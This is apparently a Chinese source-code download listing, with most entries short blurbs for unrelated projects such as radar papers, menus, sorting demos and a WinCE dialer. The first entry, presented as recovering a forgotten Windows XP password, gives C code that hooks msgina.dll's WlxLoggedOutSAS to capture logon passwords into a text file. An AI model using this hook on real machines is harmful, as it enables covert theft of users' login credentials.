-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
几篇有关雷达目标识别的优秀论文(基于非线性方法的雷达目标识别研究.NH基于高分辨距离像的雷达目标识别.NH雷达目标识别系统的研究和设计.KDH).part2...
几篇有关雷达目标识别的优秀论文(基于非线性方法的雷达目标识别研究.NH基于高分辨距离像的雷达目标识别.NH雷达目标识别系统的研究和设计.KDH).part2-Several of the radar target recognition of outstanding paper (based on nonlinear methods of study of radar target recognition. NH HRRP-based radar target identification. NH radar target identification system research and design. KDH). Part2
- 2022-02-06 09:33:48下载
- 积分:1
-
一个透明的菜单栏的例子,非常漂亮。灵感来源于苹果操作系统...
一个透明的菜单栏的例子,非常漂亮。灵感来源于苹果操作系统-Mac OS has nice transparent menus, which uses hardware acceleration. It is al most impossible to achieve that kind of effect in MS Windows, but one can surely create menus, which are looking like that of Mac.
- 2022-11-29 22:35:03下载
- 积分:1
-
用vb写的一个简单的起泡法的演示的程序。
用vb写的一个简单的起泡法的演示的程序。-with vb write a simple sparkling demonstration of the law of procedure.
- 2022-11-16 10:00:03下载
- 积分:1
-
wince dial wince dial
wince 下拨号程序,非常好的,本人工具-wince dial wince dial
- 2022-03-29 23:00:34下载
- 积分:1
-
C C++算法实例(宝贵资源)个人收藏起来不错的东西,学习C需要的,我收益不错,希望对大家有...
C C++算法实例(宝贵资源)个人收藏起来不错的东西,学习C需要的,我收益不错,希望对大家有-C C++ algorithm for example (a valuable resource) to the personal collection of good things, needs to learn C, I am a good income, in the hope that we have
- 2022-08-25 13:18:34下载
- 积分:1
-
Image edge detection software, ready to work together to force a friend in China...
图像边缘检测软件,愿与广大朋友共同合作至力于中国的源代码开发事业-Image edge detection software, ready to work together to force a friend in China to develop the cause of the source code
- 2022-11-20 14:20:03下载
- 积分:1
-
数据库处理 读取传入的参数 将传入的参数写到数据库
数据库处理 读取传入的参数 将传入的参数写到数据库-database processing parameters will be imported into the database parameters wrote
- 2022-12-27 18:30:04下载
- 积分:1
-
这个应该是C或者C++编的程序,有关排序的,游行去可以下!...
这个应该是C或者C++编的程序,有关排序的,游行去可以下!-C or C++ compile procedures, the sequencing of the procession can go under!
- 2022-06-26 02:08:07下载
- 积分:1
-
how to set up a sister city links are so few routes do not intersect also the la...
动态规划法---如何设置友好城市间的航线使的航线数又最大又不相交-dynamic programming-- how to set up a sister city links are so few routes do not intersect also the largest
- 2022-09-08 19:00:02下载
- 积分:1